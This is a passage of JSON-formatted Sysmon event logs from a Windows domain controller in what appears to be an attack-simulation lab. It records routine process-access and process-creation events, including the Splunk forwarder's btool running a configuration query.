LL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3050,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3051,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3052,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3053,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3054,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3055,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-001018150500}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-001018150500}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3056,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.788\r\nProcessGuid: {A837DB8D-0238-5F25-0000-0010D4150500}\r\nProcessId: 5112\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list httpServerListener: --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-0238-5F25-0000-001018150500}\r\nParentProcessId: 5100\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list httpServerListener: --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.788","ProcessGuid":"{A837DB8D-0238-5F25-0000-0010D4150500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list httpServerListener: --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-0238-5F25-0000-001018150500}","ParentProcessId":"5100","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list httpServerListener: --no-log","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3057,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-0238-5F25-0000-001018150500}\r\nSourceProcessId: 5100\r\nSourceThreadId: 5104\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-0010D4150500}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-0238-5F25-0000-001018150500}","SourceProcessId":"5100","SourceThreadId":"5104","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-0010D4150500}","TargetProcessId":"5112","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3058,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-0010D4150500}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-0010D4150500}","TargetProcessId":"5112","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
